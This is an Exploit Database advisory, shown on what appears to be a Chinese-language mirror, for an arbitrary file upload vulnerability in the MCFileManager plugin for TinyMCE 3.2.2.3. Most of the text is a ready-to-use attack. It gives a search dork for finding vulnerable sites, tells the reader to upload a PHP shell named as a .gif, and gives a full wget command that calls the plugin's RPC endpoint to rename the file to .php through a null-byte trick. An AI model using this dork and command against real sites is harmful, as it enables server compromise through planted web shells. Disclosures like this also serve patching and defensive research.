MCFileManager Plugin for TinyMCE 3.2.2.3 – Arbitrary File Upload

• Exploit Database
• 114 阅读

• 作者： Vladimir Vorontsov
  日期： 2010-12-18
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/15768/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33

  ============================================== File Upload Vulnerability [ Plugins tiny_mce ] ==============================================   http://tinymce.moxiecode.com/plugins_filemanager.php Major version 3 Minor version 2.2.3   ####################################################################   Author : Vladimir Vorontsov Contact: d0znpp [at] gmail [dot] com   Greetz : GNU My Group : ONSEC Russian Security Team   ####################################################################   [~] DORK: inurl:/tiny_mce/plugins/filemanager/   --------------------------------------------------------------------   [~] You go to: http://web.com/tiny_mce/plugins/filemanager/pages/fm/index.html [~] Upload shell : use PHP content and .gif extension, in example a.gif [~] Move it 2 .php : $ wget --post-data="json_data=%7B%22method%22%3A%22fm.moveFiles%22%2C%22params%22%3A%5B%7B%22frompath0%22%3A%22%7B0%7D%2Fimages%2F *a.gif*%22%2C%22toname0%22%3A%22*a.php%00.gif*%22%7D%5D%2C%22id%22%3A%22c0%22%7D" http://web.com/tiny_mce/plugins/filemanager/rpc/index.php   ####################################################################